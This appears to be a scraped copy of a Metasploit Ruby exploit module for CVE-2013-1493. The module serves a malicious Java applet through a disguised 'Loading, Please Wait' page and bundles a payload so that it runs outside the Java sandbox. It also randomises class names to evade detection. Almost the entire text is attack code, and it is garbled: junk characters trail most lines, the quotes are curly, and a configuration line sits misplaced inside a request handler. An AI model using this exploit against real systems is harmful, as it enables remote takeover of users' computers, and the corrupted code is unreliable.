##
6 Z' l) h0 d3 w
7 q6 X" y* d& b6 n7 L o0 f" N5 b# This file is part of the Metasploit Framework and may be subject to, K8 X+ m; I' @& y% Q' M5 s/ \( c
# redistribution and commercial restrictions. Please see the Metasploit2 N. Z0 A1 p/ W1 i
# web site for more information on licensing and terms of use.7 A% P6 r& I: x j5 M, D% \
# http://metasploit.com/
7 a+ |' u7 @, Z##3 |9 ]& z$ E% B) M+ h2 `+ h( U- b: ]
require ‘msf/core’
' Q' T+ N2 A! f3 c/ t- w" yrequire ‘rex’3 m$ p+ x! w' x, M$ Q `
class Metasploit3 < Msf::Exploit::Remote
% r1 S( S: N8 v2 oRank = NormalRanking# T# M6 T; C. w' k6 w( W4 G
include Msf::Exploit::Remote::HttpServer::HTML
- J# r( l* {$ O2 m" }include Msf::Exploit::EXE
. g' v! B) K5 o7 T7 ?4 Tinclude Msf::Exploit::Remote::BrowserAutopwn. S5 f B8 p; P3 Q( g0 B1 V) R
autopwn_info({ :javascript => false })
; d6 t# X! p* |: j& Xdef initialize( info = {} )3 Y- H# b8 _/ S2 a" {
super( update_info( info,5 _3 C1 A9 J4 H) \. ~& c0 c
‘Name’ => ‘Java CMM Remote Code Execution’,
: n! O. }! i3 x! v- R: m7 s. U‘Description’ => %q{
# j! j9 T/ y$ S& y+ ?This module abuses the Color Management classes from a Java Applet to run) ^" c! i+ n) T: h K
arbitrary Java code outside of the sandbox as exploited in the wild in February
+ F9 R; {( U; _3 q* _5 G. t2 h$ Eand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
/ J9 Z$ O. |1 D+ w7 r* Q n; Mand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
p5 J1 _+ b3 L2 Usystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
4 T& O+ Q' T6 l- k6 \' W/ R% ?warning in order to run the malicious applet./ O. X* j& z! H& k0 k$ ]' C- k
},+ j# d( y9 Q2 {' ^* |; h
‘License’ => MSF_LICENSE,
' T6 ]4 _6 r" r6 W7 M‘Author’ =>
& T& Z& @9 D" y i$ _'Unknown', # Vulnerability discovery and Exploit
: h* d2 w. E( z: C( ?8 f) ['juan vazquez' # Metasploit module (just ported the published exploit)0 B, v3 q* a. a; n5 _
],
( V9 L# p0 T% k; z/ H" `2 }‘References’ =>- `- I3 S: w$ t1 z7 S
[+ X! `+ c; R* R
[ 'CVE', '2013-1493' ],
+ J, p# I( A1 U+ O[ 'OSVDB', '90737' ],7 E+ D9 F9 [( S: ^
[ 'BID', '58238' ],% i. T$ U6 E; l7 A
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
& L; _* ]- V9 s8 v[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
, W- f( @ u' p( m[ 'URL', 'http://pastie.org/pastes/6581034' ]. V" I# f! _8 U2 V0 K
],& m T" @' Z, X/ B
‘Platform’ => [ 'win', 'java' ],
+ `0 V- Z2 ~. z' F; p‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
& w+ v0 ~ }8 G7 B‘Targets’ =>
. g3 P( f! E, t% {/ Q* U[
' ?* I$ N& J' S" x8 B% S4 l[ 'Generic (Java Payload)',
5 Q5 _& e" |2 G{
- t2 ^2 p, g/ Z/ k'Platform' => 'java'," ^9 d1 s" G; k" Y ^0 W5 B+ [
'Arch' => ARCH_JAVA% I5 W9 f; k9 S% b9 Y
}
! E+ q& |4 m$ o: v3 Q [],
. ]7 f' D$ f; E$ a: O/ z[ 'Windows x86 (Native Payload)',
3 L) F: s% W" ~. o! X0 s e{
) {7 C6 W+ }/ A' I+ n'Platform' => 'win',
% y: u* O: J+ W5 X5 l& ~7 ^) w'Arch' => ARCH_X862 y, u! X8 D. f& ?- k$ d: l( W+ a
}
) f" F6 |& X2 d7 m1 @2 ?]( J+ G1 D: }0 `5 P
],
$ {& \/ J2 U4 o‘‘DisclosureDate’ => ‘Mar 01 2013′
' X v( r4 Z$ T)). u! W9 j+ b: a7 k: R1 [6 @6 {7 l
end2 {" k6 H/ U. e9 j; Z" A
def setup
- w% ] z" U; a M1 ^/ [) lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)& R! e' ^& H' w5 J; f- ?
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& E: A6 q b- {( ^0 b! e. |2 J
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
' k& G2 c8 N$ U E: S) {- E2 N@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }3 o( k$ }% y1 [& E$ w
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)/ x% |; V u/ c+ Q1 [
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% s Q% ]3 p' [: V# o: Kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)" D! ?4 n/ R1 s% P3 ~# ]* e
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }; e6 l7 a C& L' X3 \9 A/ p" H
@init_class_name = rand_text_alpha(“Init”.length)
, |* v/ W9 U p1 Q* v2 [' T: Q; r@init_class.gsub!(“Init”, @init_class_name)* I% U. K, c J0 I$ ~
super
7 ~" j9 `2 o# I, A' d, Rend! L5 N; V1 Y! e" T
def on_request_uri(cli, request); }; ?! h% l2 R; S) \
print_status(“handling request for #{request.uri}”)$ O; L- I0 J: L7 W6 e( }7 U# j
case request.uri
' A- A/ l# h3 o$ Lwhen /\.jar$/i
! }8 I, J$ x- n' U4 j: a/ {jar = payload.encoded_jar
; k2 E7 u, W( T! Q+ Gjar.add_file(“#{@init_class_name}.class”, @init_class)
# p/ H# z. v7 n7 @. D# jjar.add_file(“Leak.class”, @leak_class)5 B- ^% P- s. C
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)# C- @- u: j" w+ d) y4 A6 d
jar.add_file(“MyColorSpace.class”, @color_space_class)4 X: N# q8 m9 k& r6 y0 A
DefaultTarget’ => 1,
V0 L) I Z. D; dmetasploit_str = rand_text_alpha(“metasploit”.length)# ^( ~! Q: W5 I& v9 k
payload_str = rand_text_alpha(“payload”.length)
: _/ L1 F5 ~ l! L! A" Ljar.entries.each { |entry|
% i4 a: P$ |. W& bentry.name.gsub!(“metasploit”, metasploit_str)/ J% @& w) a3 j! c* d" Q' U
entry.name.gsub!(“Payload”, payload_str)
7 B4 c: u) ~- W) N( P# M" g6 oentry.data = entry.data.gsub(“metasploit”, metasploit_str)) ]' R0 \1 c( t6 \, l
entry.data = entry.data.gsub(“Payload”, payload_str)+ b0 P$ V2 Y/ n, f% b
}
8 u) g3 D e0 _8 v# Q5 b# h1 S3 ejar.build_manifest4 k* e/ o( v3 q J* L
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
+ R# J! p8 d) z4 x0 D" c3 e$ Qwhen /\/$/
6 \; G( }1 i, X9 G$ ipayload = regenerate_payload(cli)
$ ^2 t/ a, B! C8 y' uif not payload0 a$ a, Q; z+ ^ U4 c. Z& ?4 u
print_error(“Failed to generate the payload.”)' z; q' i9 v: B7 C0 m, M+ c* a2 M6 W
send_not_found(cli)" V- s0 o& v+ L* z! u
return
; R8 O( V' t) f0 G$ Mend
: B2 p8 |# _; D+ o5 Isend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
) r# N& j& H1 u, l6 L! |3 u! ielse
9 I3 L: U: J, P) c" [send_redirect(cli, get_resource() + ‘/’, ”)9 V j* `! J `0 @! j! \) W
end0 \9 b( b6 A' a
end
! G8 Q, @* I5 fdef generate_html
. N' \$ Z9 }* U9 ~+ ohtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
0 k% y' B1 `$ k" ihtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
. n) [) G" ~* mhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
* F' u" f/ r( C( L( A k! Yhtml += %Q|</applet></body></html>|
. e# J" [7 F; g2 u( I Ureturn html, G8 \, E; S1 ^# s5 A! w) [
end
* X8 u1 e1 v; f' Nend; h: l+ `/ m6 Y4 ~& g- R
end
) B" d3 G0 ]4 m7 i |